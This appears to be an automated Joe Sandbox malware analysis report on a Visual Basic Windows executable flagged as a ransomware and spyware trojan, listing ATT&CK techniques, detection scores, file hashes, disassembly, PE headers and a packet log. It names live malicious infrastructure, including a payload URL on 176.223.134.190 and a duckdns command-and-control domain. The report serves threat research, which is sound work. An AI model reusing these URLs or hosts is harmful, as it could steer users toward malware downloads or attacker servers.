            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            12
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Shared Modules
            1
            Windows Service
            1
            Bypass User Account Control
            2
            Obfuscated Files or Information
            111
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol111
            Input Capture
            2
            Encrypted Channel
            Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter
            Logon Script (Windows)1
            Access Token Manipulation
            1
            DLL Side-Loading
            2
            Credentials In Files
            1
            System Service Discovery
            SMB/Windows Admin Shares3
            Clipboard Data
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution
            Login Hook1
            Windows Service
            1
            Bypass User Account Control
            NTDS2
            File and Directory Discovery
            Distributed Component Object ModelInput Capture1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script521
            Process Injection
            1
            Virtualization/Sandbox Evasion
            LSA Secrets22
            System Information Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials21
            Security Software Discovery
            VNCGUI Input Capture22
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items521
            Process Injection
            DCSync1
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            1vQ6RSHmz5.exe24%VirustotalBrowse
            1vQ6RSHmz5.exe100%AviraTR/Dropper.Gen
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            narutochwan.duckdns.org1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            http://176.223.134.190/:D0%Avira URL Cloudsafe
            http://176.223.134.190/x/re.txt0%Avira URL Cloudsafe
            http://176.223.134.190/x/re.txt__vbaFreeVarList__vbaObjVarjC:0%Avira URL Cloudsafe
            http://176.223.134.190/0%Avira URL Cloudsafe
            narutochwan.duckdns.org100%Avira URL Cloudmalware
            http://176.223.134.190/mD0%Avira URL Cloudsafe
            http://176.223.134.190:80/x/re.txt0%Avira URL Cloudsafe
            http://176.223.134.190/1%VirustotalBrowse
            narutochwan.duckdns.org1%VirustotalBrowse
            http://176.223.134.190/x/re.txt2%VirustotalBrowse
            http://176.223.134.190:80/x/re.txt2%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            narutochwan.duckdns.org
            91.92.242.76
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            narutochwan.duckdns.orgtrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://176.223.134.190/1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gpiexplore.exefalse
            • URL Reputation: safe
            unknown
            http://176.223.134.190/:D1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://176.223.134.190/x/re.txt__vbaFreeVarList__vbaObjVarjC:1vQ6RSHmz5.exefalse
            • Avira URL Cloud: safe
            unknown
            http://176.223.134.190/x/re.txt1vQ6RSHmz5.exe, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240839275.000000000043E000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239123601.000000000048D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240979742.000000000048F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gp/C1vQ6RSHmz5.exe, 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://176.223.134.190:80/x/re.txt1vQ6RSHmz5.exe, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239123601.000000000048D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240979742.000000000048F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://176.223.134.190/mD1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            176.223.134.190
            unknownLithuania
            62282RACKRAYUABRakrejusLTfalse
            91.92.242.76
            narutochwan.duckdns.orgBulgaria
            34368THEZONEBGtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1465913
            Start date and time:2024-07-02 08:23:46 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:17
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:1vQ6RSHmz5.exe
            renamed because original name is a hash value
            Original Sample Name:566705afeb33d5a977708328cda48f1c.exe
            Detection:MAL
            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@3/0@2/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 27
            • Number of non-executed functions: 227
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            02:24:39API Interceptor2x Sleep call for process: 1vQ6RSHmz5.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            176.223.134.19016W2Swi2Gy.exeGet hashmaliciousAsyncRAT, DcRatBrowse
            • 176.223.134.190/x/dc.exe
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            RACKRAYUABRakrejusLT16W2Swi2Gy.exeGet hashmaliciousAsyncRAT, DcRatBrowse
            • 176.223.134.190
            Bootblacks.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 79.98.25.1
            Brudstyrken.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 79.98.25.1
            EL29pHUVif.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            EL29pHUVif.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            4lgy3aohRM.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            4lgy3aohRM.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            St4LvFkIRo.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            St4LvFkIRo.exeGet hashmaliciousUnknownBrowse
            • 176.223.130.167
            Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 79.98.25.1
            THEZONEBG8MAKmeCppt.elfGet hashmaliciousUnknownBrowse
            • 91.92.255.163
            xzMyweCMgr.exeGet hashmaliciousXenoRATBrowse
            • 91.92.248.167
            Ig2G1vg5Xd.exeGet hashmaliciousPureLog StealerBrowse
            • 91.92.255.36
            s3e5Mme8rD.exeGet hashmaliciousXenoRATBrowse
            • 91.92.248.167
            s36tmQLray.exeGet hashmaliciousXenoRATBrowse
            • 91.92.248.167
            0qDzlqWJxs.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
            • 91.92.246.193
            z89PO25-06-2024orderlist_PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 91.92.255.213
            i9TWeCgYBy.exeGet hashmaliciousRedLineBrowse
            • 91.92.241.104
            txJO1YslwA.rtfGet hashmaliciousUnknownBrowse
            • 91.92.244.199
            uJAa8GBpnS.exeGet hashmaliciousQuasarBrowse
            • 91.92.242.80
            No context
            No context
            No created / dropped files found
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):3.3983624188357475
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:1vQ6RSHmz5.exe
            File size:24'576 bytes
            MD5:566705afeb33d5a977708328cda48f1c
            SHA1:582441d0aca8c9217bdaa3526cbec9f377bb0555
            SHA256:ce5c39f359a043c19eaee84bb1371c0e6cb9b72ee452d3748c00a8758d52d27f
            SHA512:de40a1d3eb1598f8c69a510bd0360bb59db6aaff2beb10ab326849d026d57c4f6071e8dbb37ac68bd5fc5c6f487d7ca91f32973a9624f87761e664e63bb01f04
            SSDEEP:384:HQaJctWL1LAqwgB/7d6aJZSacu53MYlip:HQJWL1LAqwgB/7d6aJZR5di
            TLSH:49B21F3AED6E00E7E69886735462C65B673B6C62081299173A0A7B6E0F316035FD073F
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L...=Y}f.................0... ...............@....@........
            Icon Hash:00869eb0b230201f
            Entrypoint:0x401310
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x667D593D [Thu Jun 27 12:21:17 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:3ae4804b471cda151007ff7ed58cc7cd
            Instruction
            push 004013DCh
            call 00007F21F48C7553h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            inc eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ebx+57h], bl
            adc dword ptr [ebx], ebp
            retf
            adc al, 69h
            dec edi
            lodsd
            jmp far 28B3h : 9B2E492Ch
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            push eax
            jc 00007F21F48C75D1h
            push 00000065h
            arpl word ptr [ecx+esi+00h], si
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [edi], al
            add byte ptr [eax], al
            add byte ptr [ecx+ebx], bl
            inc eax
            add byte ptr [ecx], al
            add byte ptr [eax], al
            add byte ptr [eax+00004016h], ch
            add byte ptr [eax], al
            add bh, bh
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3a340x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x88c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2f3c0x30007339ffda30114004b976911ba94b5259False0.397216796875data5.144710893583032IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data0x40000x3440x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x50000x88c0x10001593197f9306b278a7c3ad8c55bb91b3False0.159423828125data1.8617260857236206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x575c0x130Device independent bitmap graphic, 32 x 64 x 1, image size 2560.3223684210526316
            RT_ICON0x54740x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.19623655913978494
            RT_ICON0x534c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.4155405405405405
            RT_GROUP_ICON0x531c0x30data1.0
            RT_VERSION0x51500x1ccdataEnglishUnited States0.5021739130434782
            DLLImport
            MSVBVM60.DLL__vbaVarSub, _CIcos, _adj_fptan, __vbaVarMove, __vbaAryMove, __vbaFreeVar, __vbaLenBstr, __vbaVarIdiv, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, _CIsin, __vbaChkstk, __vbaGenerateBoundsError, __vbaVarTstEq, __vbaObjVar, DllFunctionCall, __vbaLbound, _adj_fpatan, __vbaRedim, __vbaUI1I2, _CIsqrt, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaLateMemCall, __vbaLateMemCallLd, _CIatan, __vbaUI1Str, __vbaStrMove, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeStr, __vbaFreeObj
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 08:24:38.252011061 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.257107973 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.257240057 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.257392883 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.262238026 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930342913 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930387974 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930402040 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930512905 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.930516958 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930530071 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930541039 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930555105 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930572987 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.930598974 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.930711031 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930753946 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.930778027 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930789948 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.930815935 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:38.935498953 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.935555935 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.935565948 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:38.935631990 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.039011955 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039061069 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039076090 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039096117 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039107084 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039196014 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039278984 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039289951 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.039304018 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.039304018 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.039361954 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.039422035 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040179968 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040204048 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040215969 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040328979 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040340900 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.040348053 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.040394068 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.040930033 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041032076 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041037083 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041076899 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.041143894 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041163921 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041183949 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.041774035 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041816950 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.041821003 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041832924 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.041863918 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.041944027 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.044554949 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.044625998 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.147564888 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147603989 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147619009 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147634983 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147685051 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147783995 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147794962 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147804976 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.147818089 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.147818089 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.147862911 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.147862911 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148005009 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148062944 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148107052 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148135900 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148149014 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148188114 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148252010 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148379087 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148427963 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148456097 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148467064 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148504972 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148565054 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148650885 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148663044 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148703098 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148777008 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148787975 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148806095 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148818016 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.148840904 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.148864031 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.149017096 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149065018 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149070978 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.149076939 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149118900 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.149513006 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149605989 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149617910 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149653912 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.149740934 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149753094 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149764061 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149775982 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.149787903 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.149800062 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.150166988 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150213003 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.150223017 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150233984 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150268078 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.150373936 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150384903 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150396109 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150407076 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150424004 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.150485039 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.150619984 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150629044 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150640011 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.150666952 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.151057005 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.151103973 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.151106119 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.151118040 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.151149988 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.151211023 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.152641058 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.152683973 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.152694941 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.152712107 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.152736902 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.245485067 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.259150028 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.259382010 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.259793043 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.259844065 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.259855986 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.259901047 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.259998083 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.260009050 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.260025024 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.260037899 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.260041952 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.260097980 CEST4969980192.168.2.7176.223.134.190
